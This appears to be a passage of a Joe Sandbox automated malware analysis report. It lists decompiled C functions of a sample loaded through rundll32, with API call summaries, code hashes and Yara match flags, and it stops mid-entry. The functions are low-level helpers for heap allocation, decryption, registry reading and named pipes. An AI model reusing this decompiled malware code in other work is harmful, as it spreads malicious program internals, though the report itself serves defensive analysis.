                            • Opcode ID: 1f3699f657997dc6288c6de8df7b5e19bae04274f4d8ce940721ba61a201f624
                            • Instruction ID: e11fa8c44790d55c46ede19bae76aec72266e8527d0ba958e8fec8eae9d5a15f
                            • Opcode Fuzzy Hash: 1f3699f657997dc6288c6de8df7b5e19bae04274f4d8ce940721ba61a201f624
                            • Instruction Fuzzy Hash: DDB012B1200300ABDB124B00DE04F067A21E770B00F014020B30804070C3764C22FB15
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04A16D63 Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E04A16D63(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0x4a1a2d8, 0, _a4); // executed
				return _t2;
			}




                            0x04a16d6f
                            0x04a16d75

                            APIs
                            • RtlAllocateHeap.NTDLL(00000000,00000000,04A15D7B), ref: 04A16D6F
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: AllocateHeap
                            • String ID:
                            • API String ID: 1279760036-0
                            • Opcode ID: 44689ce4a3495e5ab2e2431eb7a941c37da4c720de2f4f3a004100265a3f7a06
                            • Instruction ID: 9c6830b3677ea42ab949f4098f4fb638b81b88eaebae5c002a87eaa53682d6c1
                            • Opcode Fuzzy Hash: 44689ce4a3495e5ab2e2431eb7a941c37da4c720de2f4f3a004100265a3f7a06
                            • Instruction Fuzzy Hash: 0CB01275100300ABDA024B00DD08F067B21F770700F004010B20944070C2770C62FB05
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04A113C7 Relevance: 1.3, APIs: 1, Instructions: 99COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E04A113C7(intOrPtr* __eax, void* __ecx, void* __edx, void* _a4, void** _a8) {
				void* _v8;
				int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v144;
				int _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				char _v164;
				void* _t37;
				void* _t42;
				void* _t51;
				int _t53;
				void* _t60;
				void* _t63;
				void* _t64;

				_t53 = 0;
				_t60 = __ecx;
				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				if(__ecx <= 0x80 ||  *__eax != 0x400) {
					L21:
					return _t53;
				} else {
					_t58 =  &_v164;
					_t37 = E04A16FD0(__eax, __edx,  &_v164,  &_v16, _a4 + __ecx - 0x80);
					if(_t37 != 0) {
						goto L21;
					}
					_t61 = _t60 - 0x80;
					if(_v148 > _t60 - 0x80) {
						goto L21;
					}
					while( *((intOrPtr*)(_t64 + _t37 - 0x8c)) == _t53) {
						_t37 = _t37 + 1;
						if(_t37 < 0x10) {
							continue;
						}
						_t53 = _v148;
						_t51 = E04A16D63(_t53);
						_v8 = _t51;
						_t73 = _t51;
						if(_t51 != 0) {
							_t53 = 0;
							L18:
							if(_t53 != 0) {
								goto L21;
							}
							L19:
							if(_v8 != 0) {
								E04A16C2C(_v8);
							}
							goto L21;
						}
						memcpy(_t51, _a4, _t53);
						L8:
						_t63 = _v8;
						E04A16EE7(_t58, _t73, _t63, _t53,  &_v32);
						if(_v32 != _v164 || _v28 != _v160 || _v24 != _v156 || _v20 != _v152) {
							L15:
							_t53 = 0;
							goto L19;
						} else {
							 *_a8 = _t63;
							goto L18;
						}
					}
					_t58 =  &_v144;
					_t42 = E04A15FBB(_t61 & 0xfffffff0, 0,  &_v144, _a4,  &_v8,  &_v12); // executed
					__eflags = _t42;
					if(_t42 != 0) {
						_t53 = _v12;
						goto L18;
					}
					_t53 = _v148;
					__eflags = _v12 - _t53;
					if(__eflags >= 0) {
						goto L8;
					}
					goto L15;
				}
			}























                            0x04a113d2
                            0x04a113d5
                            0x04a113dc
                            0x04a113df
                            0x04a113e2
                            0x04a113e7
                            0x04a114e3
                            0x04a114e7
                            0x04a113f9
                            0x04a11405
                            0x04a1140c
                            0x04a11413
                            0x00000000
                            0x00000000
                            0x04a11419
                            0x04a11421
                            0x00000000
                            0x00000000
                            0x04a11427
                            0x04a11430
                            0x04a11434
                            0x00000000
                            0x00000000
                            0x04a11436
                            0x04a1143d
                            0x04a11442
                            0x04a11445
                            0x04a11447
                            0x04a114c8
                            0x04a114cf
                            0x04a114d1
                            0x00000000
                            0x00000000
                            0x04a114d3
                            0x04a114d7
                            0x04a114dc
                            0x04a114dc
                            0x00000000
                            0x04a114d7
                            0x04a1144e
                            0x04a11456
                            0x04a11456
                            0x04a1145f
                            0x04a1146d
                            0x04a114c4
                            0x04a114c4
                            0x00000000
                            0x04a11490
                            0x04a11493
                            0x00000000
                            0x04a11493
                            0x04a1146d
                            0x04a114a2
                            0x04a114b0
                            0x04a114b5
                            0x04a114b7
                            0x04a114cc
                            0x00000000
                            0x04a114cc
                            0x04a114b9
                            0x04a114bf
                            0x04a114c2
                            0x00000000
                            0x00000000
                            0x00000000
                            0x04a114c2

                            APIs
                            • memcpy.NTDLL(00000000,?,?,?,?,?,00000001,?,?,?), ref: 04A1144E
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: memcpy
                            • String ID:
                            • API String ID: 3510742995-0
                            • Opcode ID: abb85139146cbcf153fec2de335a04d8f6deebc596956e986da98068f9f02800
                            • Instruction ID: 4bdc03a42786dbb593543d7c8a855b3f169fd75377d3797e68983d4c86e51a67
                            • Opcode Fuzzy Hash: abb85139146cbcf153fec2de335a04d8f6deebc596956e986da98068f9f02800
                            • Instruction Fuzzy Hash: CE3110B1A00119EFDF21DF94C9C0FEEB7B9BB08758F1044A9E609A71A1D634AE45CB64
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F7FD24 Relevance: 1.3, APIs: 1, Instructions: 63memoryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 04F81ECA: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,04F62C89,?), ref: 04F81F02
                              • Part of subcall function 04F81ECA: RtlAllocateHeap.NTDLL(00000000,?), ref: 04F81F16
                              • Part of subcall function 04F81ECA: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,04F62C89,?), ref: 04F81F30
                              • Part of subcall function 04F81ECA: RegCloseKey.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,04F62C89,?,?,?), ref: 04F81F5A
                            • HeapFree.KERNEL32(00000000,?,?,?,?,?,7620F710,00000000,00000000,?,?,?,04F6E30A,?), ref: 04F7FDB6
                              • Part of subcall function 04F7AF83: memcpy.NTDLL(?,?,00000000,?,?,?,00000000,?,?,04F663CD,00000000,00000001,-00000007,?,00000000), ref: 04F7AFA6
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: HeapQueryValue$AllocateCloseFreememcpy
                            • String ID:
                            • API String ID: 1301464996-0
                            • Opcode ID: ea0cc4e8bd53f0d71f7091ba8e1d16edff5bfcadbdfffa01e0b498c1f5facb34
                            • Instruction ID: 355013e0f24e7a084ae124f8a8aa647f8cfb8853bfac4cb8873801e69e2ce7de
                            • Opcode Fuzzy Hash: ea0cc4e8bd53f0d71f7091ba8e1d16edff5bfcadbdfffa01e0b498c1f5facb34
                            • Instruction Fuzzy Hash: 17119172A10205AFDB549F48DC90EBE77A9EF48314F10406EE5019F241EBB9BD029B64
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F72BFD Relevance: 1.3, APIs: 1, Instructions: 60COMMON
                            Download Yara Rule
                            APIs
                            • memcpy.NTDLL(?,04F8A324,00000018,04F76FFC,06318E36,?,04F76FFC,06318E36,?,04F76FFC,06318E36,?,?,?,?,04F76FFC), ref: 04F72CB2
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: memcpy
                            • String ID:
                            • API String ID: 3510742995-0
                            • Opcode ID: 87bfa070c989df27dd4f5d68c14178a437e901f04c82762713783882105a641d
                            • Instruction ID: 467606fd4d6a0af1ef14076dab4e69ce05c70986e14f898e11ded378054f4323
                            • Opcode Fuzzy Hash: 87bfa070c989df27dd4f5d68c14178a437e901f04c82762713783882105a641d
                            • Instruction Fuzzy Hash: CD115B76E0060CABDB15EF55FC41CB63BA9EB95321705816FF5188F251D73AA902CB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F6708F Relevance: 1.3, APIs: 1, Instructions: 50memoryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 04F81ECA: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,04F62C89,?), ref: 04F81F02
                              • Part of subcall function 04F81ECA: RtlAllocateHeap.NTDLL(00000000,?), ref: 04F81F16
                              • Part of subcall function 04F81ECA: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,04F62C89,?), ref: 04F81F30
                              • Part of subcall function 04F81ECA: RegCloseKey.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,04F62C89,?,?,?), ref: 04F81F5A
                            • HeapFree.KERNEL32(00000000,?,?,?,?,?,?), ref: 04F67100
                              • Part of subcall function 04F64963: StrChrA.SHLWAPI(?,0000002E,00000000,?,?,00000000,04F670EB,00000000,?,00000000,?,?,?,?,?,?), ref: 04F64975
                              • Part of subcall function 04F64963: StrChrA.SHLWAPI(?,00000020,?,00000000,04F670EB,00000000,?,00000000,?,?,?,?,?,?), ref: 04F64984
                              • Part of subcall function 04F6EE04: CloseHandle.KERNEL32(?,00000000,?,00000000), ref: 04F6EE2A
                              • Part of subcall function 04F6EE04: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 04F6EE36
                              • Part of subcall function 04F6EE04: GetModuleHandleA.KERNEL32(?,0631978E,00000000,?,00000000), ref: 04F6EE56
                              • Part of subcall function 04F6EE04: GetProcAddress.KERNEL32(00000000), ref: 04F6EE5D
                              • Part of subcall function 04F6EE04: Thread32First.KERNEL32(?,0000001C), ref: 04F6EE6D
                              • Part of subcall function 04F6EE04: CloseHandle.KERNEL32(?), ref: 04F6EEB5
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseHandle$HeapQueryValue$AddressAllocateCreateFirstFreeModuleProcSnapshotThread32Toolhelp32
                            • String ID:
                            • API String ID: 2627809124-0
                            • Opcode ID: 0216c5c9e2c7f1b23108812f61cdf60909829f6fbb6880e689dd9ebec413809e
                            • Instruction ID: 7d965489ad8e45407f6ea5d2ba96c547b360dbe5f3b29ea9802ebf805ebf1e4a
                            • Opcode Fuzzy Hash: 0216c5c9e2c7f1b23108812f61cdf60909829f6fbb6880e689dd9ebec413809e
                            • Instruction Fuzzy Hash: 9C016271A10519BFEB11EBA9ED84CAFB7ECEF55258700005AF502A7100DA79BE06DB70
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F8157A Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 04F81ECA: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,04F62C89,?), ref: 04F81F02
                              • Part of subcall function 04F81ECA: RtlAllocateHeap.NTDLL(00000000,?), ref: 04F81F16
                              • Part of subcall function 04F81ECA: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,04F62C89,?), ref: 04F81F30
                              • Part of subcall function 04F81ECA: RegCloseKey.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,04F62C89,?,?,?), ref: 04F81F5A
                            • HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,00000000,04F704AC,04F7C384,00000000,00000000), ref: 04F815F0
                              • Part of subcall function 04F64963: StrChrA.SHLWAPI(?,0000002E,00000000,?,?,00000000,04F670EB,00000000,?,00000000,?,?,?,?,?,?), ref: 04F64975
                              • Part of subcall function 04F64963: StrChrA.SHLWAPI(?,00000020,?,00000000,04F670EB,00000000,?,00000000,?,?,?,?,?,?), ref: 04F64984
                              • Part of subcall function 04F63172: lstrlen.KERNEL32(04F643C6,00000000,?,?,?,?,04F643C6,00000035,00000000,?,00000000), ref: 04F631A2
                              • Part of subcall function 04F63172: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 04F631B8
                              • Part of subcall function 04F63172: memcpy.NTDLL(00000010,04F643C6,00000000,?,?,04F643C6,00000035,00000000), ref: 04F631EE
                              • Part of subcall function 04F63172: memcpy.NTDLL(00000010,00000000,00000035,?,?,04F643C6,00000035), ref: 04F63209
                              • Part of subcall function 04F63172: CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000028,00000001), ref: 04F63227
                              • Part of subcall function 04F63172: GetLastError.KERNEL32(?,?,04F643C6,00000035), ref: 04F63231
                              • Part of subcall function 04F63172: HeapFree.KERNEL32(00000000,00000000,?,?,04F643C6,00000035), ref: 04F63254
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateFreeQueryValuememcpy$CallCloseErrorLastNamedPipelstrlen
                            • String ID:
                            • API String ID: 730886825-0
                            • Opcode ID: fdf2544cf5d8e3ca40498a6d1d9d70220775ef1147a4e087f2a9ba623d60c4f4
                            • Instruction ID: e1437b08c5fa5e9e3f550f2e2a29c220a1974baba07b429f483448934b6a8f53
                            • Opcode Fuzzy Hash: fdf2544cf5d8e3ca40498a6d1d9d70220775ef1147a4e087f2a9ba623d60c4f4
                            • Instruction Fuzzy Hash: 41011271910204BBEB11EB95ED45FAE77ECDF45754F100159B501AE140DB74BE06DB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F74837 Relevance: 1.3, APIs: 1, Instructions: 45COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 04F69394: RtlAllocateHeap.NTDLL(00000000,?,04F70051), ref: 04F693A0
                            • memset.NTDLL ref: 04F74855
                              • Part of subcall function 04F7A451: memset.NTDLL ref: 04F7A477
                              • Part of subcall function 04F7A451: memcpy.NTDLL ref: 04F7A49F
                              • Part of subcall function 04F7A451: GetLastError.KERNEL32(00000010,00000218,04F8386D,00000100,?,00000318,00000008), ref: 04F7A4B6
                              • Part of subcall function 04F7A451: GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,04F8386D,00000100), ref: 04F7A599
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLastmemset$AllocateHeapmemcpy
                            • String ID:
                            • API String ID: 4290293647-0
                            • Opcode ID: b830e6e4ca33bbd16fb0f49671e58ee5d3fb618611dc5768a96a6b5296d5d414
                            • Instruction ID: 37d341a789b39c1af837bc1edcdb2798d53bdfa4fbecae18f5b56b5513c43492
                            • Opcode Fuzzy Hash: b830e6e4ca33bbd16fb0f49671e58ee5d3fb618611dc5768a96a6b5296d5d414
                            • Instruction Fuzzy Hash: 4701FD719017586BE7219E28DC48F9B3BE8AB44318F04842BF8488A290D37DE9168AA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04A1155C Relevance: 1.3, APIs: 1, Instructions: 43memoryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E04A1155C(intOrPtr* __edi, void* _a4, void* _a8, unsigned int _a12) {
				void* _t21;
				void* _t22;
				signed int _t24;
				intOrPtr* _t26;
				void* _t27;

				_t26 = __edi;
				if(_a4 == 0) {
					L2:
					_t27 = E04A112CA(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
					if(_t27 == 0) {
						_t24 = _a12 >> 1;
						if(_t24 == 0) {
							_t27 = 2;
							HeapFree( *0x4a1a2d8, 0, _a4);
						} else {
							_t21 = _a4;
							 *((short*)(_t21 + _t24 * 2 - 2)) = 0;
							 *_t26 = _t21;
						}
					}
					L6:
					return _t27;
				}
				_t22 = E04A11B6F(_a4, _a8, _a12, __edi); // executed
				_t27 = _t22;
				if(_t27 == 0) {
					goto L6;
				}
				goto L2;
			}








                            0x04a1155c
                            0x04a11564
                            0x04a1157b
                            0x04a11596
                            0x04a1159a
                            0x04a1159f
                            0x04a115a1
                            0x04a115b3
                            0x04a115bf
                            0x04a115a3
                            0x04a115a3
                            0x04a115a8
                            0x04a115ad
                            0x04a115ad
                            0x04a115a1
                            0x04a115c5
                            0x04a115c9
                            0x04a115c9
                            0x04a11570
                            0x04a11575
                            0x04a11579
                            0x00000000
                            0x00000000
                            0x00000000

                            APIs
                              • Part of subcall function 04A11B6F: SysFreeString.OLEAUT32(00000000), ref: 04A11BD2
                            • HeapFree.KERNEL32(00000000,00000000,00000000,80000002,7620F710,?,00000000,?,00000000,?,04A121A9,?,004F0053,05539400,00000000,?), ref: 04A115BF
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: Free$HeapString
                            • String ID:
                            • API String ID: 3806048269-0
                            • Opcode ID: 4832f39964da2d6b18570ada3ffc68cc2921ff63077b1828a28a7f09d1cda338
                            • Instruction ID: 011db6281df5086fc5ea01a5364dc697436785f264da4515ecee48d1bef20b85
                            • Opcode Fuzzy Hash: 4832f39964da2d6b18570ada3ffc68cc2921ff63077b1828a28a7f09d1cda338
                            • Instruction Fuzzy Hash: B5014F32100619BBDB229F94CC01FEA3BA9EF1C7A0F448424FF069A130D731E961DB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04A124B3 Relevance: 1.3, APIs: 1, Instructions: 36stringCOMMON
                            Download Yara Rule
                            C-Code - Quality: 75%
                            			E04A124B3(void* __ecx, void* __edx, void* _a4, void* _a8) {
				void* _t13;
				void* _t21;

				_t11 =  &_a4;
				_t21 = 0;
				__imp__( &_a8);
				_t13 = E04A15FBB( &_a4 + 1, 1, _a8, _a4, _a4, _t11); // executed
				if(_t13 == 0) {
					_t21 = E04A16D63(_a8 + _a8);
					if(_t21 != 0) {
						E04A1298F(_a4, _t21, _t23);
					}
					E04A16C2C(_a4);
				}
				return _t21;
			}





                            0x04a124bb
                            0x04a124c2
                            0x04a124c4
                            0x04a124d3
                            0x04a124da
                            0x04a124e9
                            0x04a124ed
                            0x04a124f4
                            0x04a124f4
                            0x04a124fc
                            0x04a12501
                            0x04a12506

                            APIs
                            • lstrlen.KERNEL32(00000000,00000000,04A158D7,00000000,?,04A11D97,00000000,04A158D7,?,746BC740,04A158D7,00000000,055395B0), ref: 04A124C4
                              • Part of subcall function 04A15FBB: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,04A124D8,00000001,04A158D7,00000000), ref: 04A15FF3
                              • Part of subcall function 04A15FBB: memcpy.NTDLL(04A124D8,04A158D7,00000010,?,?,?,04A124D8,00000001,04A158D7,00000000,?,04A11D97,00000000,04A158D7,?,746BC740), ref: 04A1600C
                              • Part of subcall function 04A15FBB: CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 04A16035
                              • Part of subcall function 04A15FBB: CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 04A1604D
                              • Part of subcall function 04A15FBB: memcpy.NTDLL(00000000,746BC740,055395B0,00000010), ref: 04A1609F
                              • Part of subcall function 04A16D63: RtlAllocateHeap.NTDLL(00000000,00000000,04A15D7B), ref: 04A16D6F
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: Crypt$memcpy$AcquireAllocateContextHeapImportParamlstrlen
                            • String ID:
                            • API String ID: 894908221-0
                            • Opcode ID: 240399a2ef63c10b17167aa497efe6e31b730df1dff9e3415d0b7a861153672b
                            • Instruction ID: af8c204a9a92a8e586cf5c9c54602e1865d815fa91b150417cce53a65afd1cad
                            • Opcode Fuzzy Hash: 240399a2ef63c10b17167aa497efe6e31b730df1dff9e3415d0b7a861153672b
                            • Instruction Fuzzy Hash: 71F03A7B100109BBDF116F59DD40DEB7BADEF847A4B018022FD09DA020DA31EA559BA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04A174B6 Relevance: 1.3, APIs: 1, Instructions: 26stringCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E04A174B6(intOrPtr _a4, intOrPtr _a8, void* _a12, intOrPtr _a16, WCHAR* _a20) {
				void* _t17;

				if(_a4 == 0) {
					L2:
					return E04A123D9(_a8, 1, _a12, _a16, _a20, lstrlenW(_a20) + _t14 + 2);
				}
				_t17 = E04A114F1(_a4, _a8, _a12, _a16, _a20); // executed
				if(_t17 != 0) {
					goto L2;
				}
				return _t17;
			}




                            0x04a174be
                            0x04a174d8
                            0x00000000
                            0x04a174f4
                            0x04a174cf
                            0x04a174d6
                            0x00000000
                            0x00000000
                            0x04a174fb

                            APIs
                            • lstrlenW.KERNEL32(?,?,?,04A1363B,3D04A190,80000002,04A17168,04A17283,74666F53,4D4C4B48,04A17283,?,3D04A190,80000002,04A17168,?), ref: 04A174DB
                              • Part of subcall function 04A114F1: SysAllocString.OLEAUT32(04A17283), ref: 04A1150A
                              • Part of subcall function 04A114F1: SysFreeString.OLEAUT32(00000000), ref: 04A1154B
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: String$AllocFreelstrlen
                            • String ID:
                            • API String ID: 3808004451-0
                            • Opcode ID: 976a01818864cb983cccc36a924a8971dceef1565a99b5f7f501af9f970d5f46
                            • Instruction ID: 8abc00574670d80801790f78a8c652e0ee1577839c61e75d3d11ba3c4ac9a42d
                            • Opcode Fuzzy Hash: 976a01818864cb983cccc36a924a8971dceef1565a99b5f7f501af9f970d5f46
                            • Instruction Fuzzy Hash: 61F0923600010EBFEF029F90ED05EEA3F6AEB18754F048014BA0458171D772D5B1EBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04A12B23 Relevance: 1.3, APIs: 1, Instructions: 23COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E04A12B23(void* __edi, void* _a4) {
				int _t7;
				int _t12;

				_t7 = E04A12575(__edi, _a4,  &_a4); // executed
				_t12 = _t7;
				if(_t12 != 0) {
					memcpy(__edi, _a4, _t12);
					 *((char*)(__edi + _t12)) = 0;
					E04A16C2C(_a4);
				}
				return _t12;
			}





                            0x04a12b2f
                            0x04a12b34
                            0x04a12b38
                            0x04a12b3f
                            0x04a12b4a
                            0x04a12b4e
                            0x04a12b4e
                            0x04a12b57

                            APIs
                              • Part of subcall function 04A12575: memcpy.NTDLL(00000000,00000110,?,?,?,?,?,?,?,04A14493,?), ref: 04A125AB
                              • Part of subcall function 04A12575: memset.NTDLL ref: 04A12621
                              • Part of subcall function 04A12575: memset.NTDLL ref: 04A12635
                            • memcpy.NTDLL(?,?,00000000,?,?,?,?,?,04A14493,?,?,?,?), ref: 04A12B3F
                              • Part of subcall function 04A16C2C: RtlFreeHeap.NTDLL(00000000,00000000,04A15E1D,00000000,?,?,00000000), ref: 04A16C38
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: memcpymemset$FreeHeap
                            • String ID:
                            • API String ID: 3053036209-0
                            • Opcode ID: 9861f71267f26eea5288bfea07ab5eea21efb883178210c204045fd7d85c8362
                            • Instruction ID: 53959d7b95a5a0620cf05f0a976a384d1cf9f95b4913a0b683100a161fe1a6ef
                            • Opcode Fuzzy Hash: 9861f71267f26eea5288bfea07ab5eea21efb883178210c204045fd7d85c8362
                            • Instruction Fuzzy Hash: 60E08C7740112877EB122E94EC00EEB7F5CDF556E5F004024FE089A220D632E61097E1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F673EB Relevance: 1.3, APIs: 1, Instructions: 19COMMON
                            Download Yara Rule
                            APIs
                            • memset.NTDLL ref: 04F673F5
                              • Part of subcall function 04F66261: RegOpenKeyExA.KERNEL32(?,00000000,00000000,00020119,?,?,?,00000000), ref: 04F662A8
                              • Part of subcall function 04F66261: RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?,?,?,00000000), ref: 04F662BE
                              • Part of subcall function 04F66261: RegCloseKey.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 04F66307
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Open$Closememset
                            • String ID:
                            • API String ID: 1685373161-0
                            • Opcode ID: eae4752445d7aaf48354e339488d86f7a0e057409763ad57a1612276153bc34b
                            • Instruction ID: f5ab505ce883105e0626a98e0a057fe724b2dfbaab1c022b9c0606a020a55ce9
                            • Opcode Fuzzy Hash: eae4752445d7aaf48354e339488d86f7a0e057409763ad57a1612276153bc34b
